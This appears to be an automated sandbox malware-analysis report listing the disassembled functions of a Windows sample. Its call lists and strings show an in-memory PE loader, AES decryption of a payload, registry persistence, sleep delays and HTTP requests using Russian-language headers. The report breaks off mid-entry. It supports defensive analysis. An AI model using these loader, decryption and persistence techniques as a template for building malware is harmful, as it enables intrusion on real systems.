                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                              • Part of subcall function 004021F0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                              • Part of subcall function 004021F0: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                              • Part of subcall function 004021F0: CloseHandle.KERNEL32(00000000), ref: 0040224E
                                            • __Init_thread_footer.LIBCMT ref: 00404202
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                            • String ID: KDOX$SUB=$]DFE$^OX*$get$viFO
                                            • API String ID: 995133137-4208347134
                                            • Opcode ID: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                            • Instruction ID: 2a7656185698f67e8fe61b04cbca63a222de47e8cf16a67dea48f36782a400ee
                                            • Opcode Fuzzy Hash: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                            • Instruction Fuzzy Hash: 7BF2D1B0E042188BDB24DF24CC49B9EBBB1EF45304F5441E9E5097B2D2DB78AA85CF59
                                            Function 00404F50 Relevance: 40.1, APIs: 16, Strings: 6, Instructions: 1645sleepregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,92291A76), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 004050BD
                                            • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                            • __Init_thread_footer.LIBCMT ref: 004053CB
                                            • Sleep.KERNEL32(000007D0), ref: 00405735
                                            • Sleep.KERNEL32(000007D0), ref: 0040574F
                                            • CoUninitialize.OLE32(?,?,0042DB3D,?,?,?,?,?,?,?,?,?,?,00000000,0042DB21), ref: 00405785
                                            • CoUninitialize.OLE32(?,?,?,?,?,0042DB3D,?,?,?,?,?,?,?), ref: 004057B1
                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                            • String ID: DFEK$SUB=$get$mixone$updateSW$U%
                                            • API String ID: 606935701-3680244588
                                            • Opcode ID: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                            • Instruction ID: 0d5b8b6ccd7ac2cce54ba59243f10dcebe2db4c82d63bd9967a8cdfa7b9099a4
                                            • Opcode Fuzzy Hash: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                            • Instruction Fuzzy Hash: F5D20471D001148BDB14EB24CC597AEBB75AF01308F5481BEE8097B2D2DB78AE85CF99
                                            Function 00402EC0 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 454COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2198 402ec0-402ede 2199 402ee0-402f07 SetLastError call 4029f0 call 4099d7 2198->2199 2200 402f08-402f10 2198->2200 2201 402f12 2200->2201 2202 402f3d-402f47 2200->2202 2205 402f17-402f3c call 4029f0 SetLastError call 4099d7 2201->2205 2206 402f71-402f7f 2202->2206 2207 402f49-402f70 SetLastError call 4029f0 call 4099d7 2202->2207 2209 402f81-402f86 2206->2209 2210 402f88-402f91 2206->2210 2209->2205 2214 402f93-402f98 2210->2214 2215 402f9d-402fa5 2210->2215 2214->2205 2218 402fb1-402fbe 2215->2218 2219 402fa7-402fac 2215->2219 2222 402fc0-402fc2 2218->2222 2223 402fe7-40300a GetNativeSystemInfo 2218->2223 2219->2205 2226 402fc5-402fcc 2222->2226 2227 403016-40302e VirtualAlloc 2223->2227 2228 40300c-403011 2223->2228 2231 402fd3 2226->2231 2232 402fce-402fd1 2226->2232 2229 403030-403040 VirtualAlloc 2227->2229 2230 403056-403075 HeapAlloc 2227->2230 2228->2205 2229->2230 2233 403042-40304f call 4029f0 2229->2233 2239 403077-403084 VirtualFree 2230->2239 2240 40308b-4030d1 2230->2240 2234 402fd5-402fe2 2231->2234 2232->2234 2233->2230 2234->2226 2237 402fe4 2234->2237 2237->2223 2239->2240 2241 4030d7-4030d9 SetLastError 2240->2241 2242 40316f-4031b9 VirtualAlloc call 40afb0 2240->2242 2244 4030df-4030e3 2241->2244 2249 40326d-403278 2242->2249 2250 4031bf 2242->2250 2246 4030e5-4030f2 2244->2246 2247 4030f6-403106 call 40fab8 2244->2247 2246->2247 2255 403135-40313a 2247->2255 2256 403108-40310d 2247->2256 2253 4032fd 2249->2253 2254 40327e-403285 2249->2254 2252 4031c2-4031c7 2250->2252 2258 403206-40320e 2252->2258 2259 4031c9-4031d1 2252->2259 2257 403302-40330e call 402cd0 2253->2257 2260 403287-403289 2254->2260 2261 40328e-4032a0 2254->2261 2268 40313c-40314c 2255->2268 2269 40314f-40316e HeapFree call 4099d7 2255->2269 2263 40312c-403132 call 40fab8 2256->2263 2264 40310f 2256->2264 2257->2244 2283 403314-403316 call 402b50 2257->2283 2258->2241 2262 403214-403227 call 402e30 2258->2262 2266 403252-403264 2259->2266 2267 4031d3-4031ed 2259->2267 2260->2257 2261->2253 2270 4032a2-4032b7 2261->2270 2279 403229-40322e 2262->2279 2263->2255 2273 403110-403115 2264->2273 2266->2252 2276 40326a 2266->2276 2267->2244 2292 4031f3-403204 call 40b530 2267->2292 2268->2269 2271 4032b9-4032bc 2270->2271 2272 4032ee-4032f8 2270->2272 2277 4032c0-4032d1 2271->2277 2272->2270 2280 4032fa 2272->2280 2281 403126-40312a 2273->2281 2282 403117-403123 2273->2282 2276->2249 2287 4032d3-4032db 2277->2287 2288 4032de-4032ec 2277->2288 2279->2244 2290 403234-403249 call 40afb0 2279->2290 2280->2253 2281->2263 2281->2273 2282->2281 2296 40331b-40331d 2283->2296 2287->2288 2288->2272 2288->2277 2301 40324c-40324f 2290->2301 2292->2301 2296->2244 2300 403323-40332d 2296->2300 2302 403351-403358 2300->2302 2303 40332f-403338 2300->2303 2301->2266 2304 4033aa-4033c3 call 4099d7 2302->2304 2305 40335a-403363 2302->2305 2303->2302 2306 40333a-40333e 2303->2306 2309 403394-4033a9 call 4099d7 2305->2309 2310 403365-40336e 2305->2310 2306->2302 2307 403340-40334f 2306->2307 2307->2302 2316 403370 2310->2316 2317 40337a-403393 call 4099d7 2310->2317 2316->2317
                                            APIs
                                            • SetLastError.KERNEL32(0000000D), ref: 00402EE2
                                            • SetLastError.KERNEL32(000000C1), ref: 00402F24
                                            Strings
                                            • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402F93
                                            • alignedImageSize != AlignValueUp!, xrefs: 0040300C
                                            • DOS header size is not valid!, xrefs: 00402F51
                                            • p.@P.@0.@, xrefs: 004030C5
                                            • Section alignment invalid!, xrefs: 00402FA7
                                            • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402F81
                                            • DOS header is not valid!, xrefs: 00402F12
                                            • Size is not valid!, xrefs: 00402EE8
                                            • ERROR_OUTOFMEMORY!, xrefs: 00403042
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$p.@P.@0.@
                                            • API String ID: 1452528299-2075088523
                                            • Opcode ID: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                            • Instruction ID: 9256140b0f890bfcd87a01f3051d579660d3e2dc250f0df49545701e60f9fd82
                                            • Opcode Fuzzy Hash: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                            • Instruction Fuzzy Hash: CCF1CE71B002059BCB10CFA9D985BAAB7B4BF48305F14417AE909EB3C2D779ED11CB98
                                            Function 004035B0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2391 4035b0-403638 CryptAcquireContextW 2392 4036fa-403710 GetLastError CryptReleaseContext 2391->2392 2393 40363e-40365c CryptCreateHash 2391->2393 2394 403844-40384a 2392->2394 2393->2392 2395 403662-403675 2393->2395 2396 403874-403891 call 4099d7 2394->2396 2397 40384c-403858 2394->2397 2398 403678-40367d 2395->2398 2399 40386a-403871 call 409b3c 2397->2399 2400 40385a-403868 2397->2400 2398->2398 2401 40367f-4036c6 call 409b4a call 40fcdf CryptHashData 2398->2401 2399->2396 2400->2399 2403 403892-4038a5 call 40cfaf 2400->2403 2415 4036d6-4036f8 CryptDeriveKey 2401->2415 2416 4036c8-4036d1 GetLastError 2401->2416 2413 4038a7-4038ae 2403->2413 2414 4038b8 2403->2414 2413->2414 2420 4038b0-4038b4 2413->2420 2415->2392 2417 403715-403716 call 40fb0d 2415->2417 2416->2394 2421 40371b-403767 call 40afb0 call 409b4a 2417->2421 2420->2414 2426 403838-40383e CryptDestroyKey 2421->2426 2427 40376d-40377c 2421->2427 2426->2394 2428 403782-40378b 2427->2428 2429 403799-4037d4 call 40afb0 CryptDecrypt 2428->2429 2430 40378d-40378f 2428->2430 2429->2426 2433 4037d6-403801 call 40afb0 2429->2433 2430->2429 2433->2426 2436 403803-403832 2433->2436 2436->2426 2436->2428
                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,92291A76), ref: 00403630
                                            • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403654
                                            • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036BE
                                            • GetLastError.KERNEL32 ref: 004036C8
                                            • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004036F0
                                            • GetLastError.KERNEL32 ref: 004036FA
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040370A
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037CC
                                            • CryptDestroyKey.ADVAPI32(?), ref: 0040383E
                                            Strings
                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040360C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                            • API String ID: 3761881897-63410773
                                            • Opcode ID: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                            • Instruction ID: 8181a1f98bd0149a833479ac616fd79743055c61a592a1420c0c523c4d9566d8
                                            • Opcode Fuzzy Hash: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                            • Instruction Fuzzy Hash: 37819171A00218AFEF209F25CC45B9ABBB9FF45300F0081BAF90DA7291DB359E858F55
                                            Function 00402A20 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2437 402a20-402a37 2438 402a79-402a8d call 4099d7 2437->2438 2439 402a39-402a42 2437->2439 2440 402a44-402a49 2439->2440 2441 402a8e-402ad0 VirtualProtect 2439->2441 2440->2438 2445 402a4b-402a50 2440->2445 2441->2438 2444 402ad2-402af4 GetLastError FormatMessageA 2441->2444 2446 402af7-402afc 2444->2446 2447 402a52-402a5a 2445->2447 2448 402a66-402a73 call 402e50 2445->2448 2446->2446 2449 402afe-402b4a LocalAlloc call 4029b0 OutputDebugStringA LocalFree * 2 call 4099d7 2446->2449 2447->2448 2450 402a5c-402a64 2447->2450 2453 402a75 2448->2453 2450->2448 2452 402a78 2450->2452 2452->2438 2453->2452
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AC8
                                            • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402ADD
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402AEB
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B06
                                            • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B25
                                            • LocalFree.KERNEL32(00000000), ref: 00402B32
                                            • LocalFree.KERNEL32(?), ref: 00402B37
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                            • String ID: %s: %s$Error protecting memory page
                                            • API String ID: 839691724-1484484497
                                            • Opcode ID: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                            • Instruction ID: 0c0000675eadf2e66051917e59d7aa22c0aaa2fc97c5d5fe75df83e4770fcd9e
                                            • Opcode Fuzzy Hash: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                            • Instruction Fuzzy Hash: 4B310731B00104AFDB10DF68DD44FAAB768EF48704F0541BEE905AB2D2DB75AE06CB98
                                            Function 00401940 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2630 401940-401a18 InternetSetFilePointer InternetReadFile 2632 401a50-401a9d call 40b530 HttpQueryInfoA 2630->2632 2636 401aa3-401ad6 CoCreateInstance 2632->2636 2637 401dea-401e16 call 4099d7 2632->2637 2636->2637 2639 401adc-401ae3 2636->2639 2639->2637 2641 401ae9-401b06 2639->2641 2642 401b10-401b15 2641->2642 2642->2642 2643 401b17-401bde call 402730 call 4015e0 2642->2643 2651 401be0-401bef 2643->2651 2652 401c0f-401c11 2643->2652 2653 401bf1-401bff 2651->2653 2654 401c05-401c0c call 409b3c 2651->2654 2655 401c17-401c1e 2652->2655 2656 401dde-401de5 2652->2656 2653->2654 2657 401e19-401e1f call 40cfaf 2653->2657 2654->2652 2655->2656 2659 401c24-401c9a call 409b4a 2655->2659 2656->2637 2666 401ca0-401cb4 2659->2666 2667 401dc4-401dda call 4099e5 2659->2667 2668 401cba-401ce9 call 409b4a 2666->2668 2669 401d5e-401d75 2666->2669 2667->2656 2680 401d4a-401d5b call 4099e5 2668->2680 2681 401ceb-401ced 2668->2681 2672 401d77-401d79 2669->2672 2673 401dba-401dc2 2669->2673 2676 401d88-401d8a 2672->2676 2677 401d7b-401d86 call 40d09d 2672->2677 2673->2667 2678 401d8c-401d9c call 40afb0 2676->2678 2679 401d9e-401daf call 40b530 call 40d09d 2676->2679 2689 401db5 call 40cf9f 2677->2689 2678->2673 2679->2689 2680->2669 2685 401d05-401d1d call 40b530 2681->2685 2686 401cef-401cf1 2681->2686 2701 401d2c-401d38 2685->2701 2702 401d1f-401d2a call 40d09d 2685->2702 2686->2685 2692 401cf3-401d03 call 40afb0 2686->2692 2689->2673 2692->2680 2701->2680 2704 401d3a-401d3f call 40d09d 2701->2704 2707 401d45 call 40cf9f 2702->2707 2704->2707 2707->2680
                                            APIs
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004019D5
                                            • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004019F8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FileInternet$PointerRead
                                            • String ID: text
                                            • API String ID: 3197321146-999008199
                                            • Opcode ID: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                            • Instruction ID: 0125e10c814f2167b0c83c61a86ba883da1fe49b2781431745f5a2561ed14111
                                            • Opcode Fuzzy Hash: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                            • Instruction Fuzzy Hash: FAC15B709002189FDB24DF64CC85BD9B7B5EF49304F1041EAE509B72A1D778AE94CF99
                                            Function 00F4D0FE Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3565 f4d0fe-f4d117 3566 f4d119-f4d11b 3565->3566 3567 f4d122-f4d12e CreateToolhelp32Snapshot 3566->3567 3568 f4d11d 3566->3568 3569 f4d130-f4d136 3567->3569 3570 f4d13e-f4d14b Module32First 3567->3570 3568->3567 3569->3570 3576 f4d138-f4d13c 3569->3576 3571 f4d154-f4d15c 3570->3571 3572 f4d14d-f4d14e call f4cdbd 3570->3572 3577 f4d153 3572->3577 3576->3566 3576->3570 3577->3571
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00F4D126
                                            • Module32First.KERNEL32(00000000,00000224), ref: 00F4D146
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f4c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: e507d7dfc0e0313ec1f929d85312605204cb9a0ea4d7a58d211414fa93b667f8
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 69F096315007146BF7203BF59C8DBAE7AECAF89734F100629FE52911C0DB74EC459A61
                                            Function 00408770 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: emp$mixtwo
                                            • API String ID: 3472027048-2390925073
                                            • Opcode ID: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                            • Instruction ID: d670b023532553bde9b5cd74a18030282768016b503e3e09e149c4df20b712b6
                                            • Opcode Fuzzy Hash: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                            • Instruction Fuzzy Hash: 15F01CB161430457E7147F65ED1B7173EA4970271CFA006ADD8141F2C2E7FB861A8BE6
                                            Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                            • __cftof.LIBCMT ref: 10001624
                                            • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                            • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                            • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                            • String ID: GET$http://
                                            • API String ID: 1233269984-1632879366
                                            • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                            • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                            • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                            • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                            Function 00401800 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401873
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401899
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018BF
                                              • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 00402599
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018E5
                                            Strings
                                            • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401877
                                            • GET, xrefs: 004020B7
                                            • text, xrefs: 00401B5F
                                            • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401832
                                            • http://, xrefs: 00401EC4, 004021A3
                                            • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018C3
                                            • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0040189D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                            • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                            • API String ID: 2146599340-4172842843
                                            • Opcode ID: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                            • Instruction ID: d9449a1bc553b4f7263359658e85a8d5597bae1f9675cad689ed873ec2693fe7
                                            • Opcode Fuzzy Hash: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                            • Instruction Fuzzy Hash: A4316371D00109AFEB14DBE9CC85FEEB7B9EB08714F60812AE521731C0C7789945CBA4
                                            Function 04D1003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2458 4d1003c-4d10047 2459 4d10049 2458->2459 2460 4d1004c-4d10263 call 4d10a3f call 4d10e0f call 4d10d90 VirtualAlloc 2458->2460 2459->2460 2475 4d10265-4d10289 call 4d10a69 2460->2475 2476 4d1028b-4d10292 2460->2476 2481 4d102ce-4d103c2 VirtualProtect call 4d10cce call 4d10ce7 2475->2481 2478 4d102a1-4d102b0 2476->2478 2480 4d102b2-4d102cc 2478->2480 2478->2481 2480->2478 2487 4d103d1-4d103e0 2481->2487 2488 4d103e2-4d10437 call 4d10ce7 2487->2488 2489 4d10439-4d104b8 VirtualFree 2487->2489 2488->2487 2491 4d105f4-4d105fe 2489->2491 2492 4d104be-4d104cd 2489->2492 2495 4d10604-4d1060d 2491->2495 2496 4d1077f-4d10789 2491->2496 2494 4d104d3-4d104dd 2492->2494 2494->2491 2500 4d104e3-4d10505 LoadLibraryA 2494->2500 2495->2496 2501 4d10613-4d10637 2495->2501 2498 4d107a6-4d107b0 2496->2498 2499 4d1078b-4d107a3 2496->2499 2502 4d107b6-4d107cb 2498->2502 2503 4d1086e-4d108be LoadLibraryA 2498->2503 2499->2498 2504 4d10517-4d10520 2500->2504 2505 4d10507-4d10515 2500->2505 2506 4d1063e-4d10648 2501->2506 2507 4d107d2-4d107d5 2502->2507 2510 4d108c7-4d108f9 2503->2510 2508 4d10526-4d10547 2504->2508 2505->2508 2506->2496 2509 4d1064e-4d1065a 2506->2509 2511 4d10824-4d10833 2507->2511 2512 4d107d7-4d107e0 2507->2512 2513 4d1054d-4d10550 2508->2513 2509->2496 2514 4d10660-4d1066a 2509->2514 2517 4d10902-4d1091d 2510->2517 2518 4d108fb-4d10901 2510->2518 2516 4d10839-4d1083c 2511->2516 2519 4d107e2 2512->2519 2520 4d107e4-4d10822 2512->2520 2521 4d105e0-4d105ef 2513->2521 2522 4d10556-4d1056b 2513->2522 2515 4d1067a-4d10689 2514->2515 2525 4d10750-4d1077a 2515->2525 2526 4d1068f-4d106b2 2515->2526 2516->2503 2527 4d1083e-4d10847 2516->2527 2518->2517 2519->2511 2520->2507 2521->2494 2523 4d1056d 2522->2523 2524 4d1056f-4d1057a 2522->2524 2523->2521 2528 4d1059b-4d105bb 2524->2528 2529 4d1057c-4d10599 2524->2529 2525->2506 2530 4d106b4-4d106ed 2526->2530 2531 4d106ef-4d106fc 2526->2531 2532 4d10849 2527->2532 2533 4d1084b-4d1086c 2527->2533 2541 4d105bd-4d105db 2528->2541 2529->2541 2530->2531 2535 4d1074b 2531->2535 2536 4d106fe-4d10748 2531->2536 2532->2503 2533->2516 2535->2515 2536->2535 2541->2513
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04D1024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691
                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction ID: 154a8ab1909e446166ca7e8a6bb3bf11d41d03e6729698bca36e6e6beee54fa4
